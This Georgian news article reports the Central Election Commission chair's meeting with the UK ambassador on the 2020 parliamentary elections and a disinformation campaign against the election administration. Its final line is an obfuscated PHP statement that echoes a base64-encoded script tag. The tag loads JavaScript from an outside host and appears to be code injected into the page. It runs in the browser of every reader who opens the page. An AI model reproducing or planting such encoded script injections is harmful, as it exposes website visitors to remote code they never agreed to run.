celsiusi
ავერსი საქკაბელი
ცენტრალური საარჩევნო კომისიის (ცესკო) თავმჯდომარე თამარ ჟვანია დიდი ბრიტანეთის ელჩს საქართველოში მარკ კლეიტონს შეხვდა.
 
როგორც WWW>BUSINESSTIME>GE-ის ცენტრალური საარჩევნო კომისიიდან აცნობეს, თამარ ჟვანიამ ელჩს დეტალური ინფორმაცია მიაწოდა 2020 წლის 31 ოქტომბრის პარლამენტის არჩევნების კენჭისყრის დღის შემდგომი პროცესების შესახებ და აღნიშნა, რომ საარჩევნო ადმინისტრაციამ პანდემიის პირობებში შეძლო პროფესიულ დონეზე არჩევნების ორგანიზება და თითოეულ ამომრჩეველს საარჩევნო უბანზე ჯანმრთელობისთვის უსაფრთხო გარემოში ჰქონდა შესაძლებლობა დაეფიქსირებინა საკუთარი არჩევანი.
 
თამარ ჟვანიას განცხადებით, საარჩევნო ადმინისტრაციამ შესაბამისი საარჩევნო დავების განხილვისას ასევე, საარჩევნო კომისიების მიერ შემაჯამებელი ოქმების მონაცემების გადამოწმებისა და გადათვლის პროცესის წარმართვით გამოხატა მზაობა ხარვეზების გამოსასწორებლად, რომლებიც საპარლამენტო არჩევნების მიმდინარეობის დროს გამოვლინდა. ცესკოს თავმჯდომარემ ასევე ისაუბრა იმ მიზანმიმართულ კამპანიაზე, რომელიც საარჩევნო ადმინისტრაციის და პროცესის დისკრედიტაციის მიზნით განხორციელდა, მათ შორის არასწორი და მცდარი ინფორმაციის გავრცელების კუთხით, რომელთა თაობაზეც ცესკომ ზუსტი ინფორმაცია და შესაბამისი სტატისტიკური მონაცემები მიაწოდა საერთაშორისო ორგანიზაციებს და სხვა ჩართულ მხარეებს.
 
როგორც შეხვედრის დასასრულს დიდი ბრიტანეთის ელჩმა მარკ კლეიტონმა განაცხადა, ის მხარდაჭერას უცხადებს საქართველოს საარჩევნო ადმინისტრაციას და მომავალში თანამშრომლობის გაღრმავების იმედს გამოთქვამს. მისი თქმით, ყველა ის რეკომენდაცია, რომელიც საერთაშორისო ორგანიზაციებისა და საქართველოში აკრედიტებული საელჩოების წარმომადგენლების მიერ იქნა გამოთქმული, უნდა იყოს გათვალისწინებული მომავალი საერთო არჩევნების ადმინისტრირების პროცესში.
 
შეხვედრა, 9 დეკემბერს ცენტრალურ საარჩევნო კომისიაში გაიმართა.
1508
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");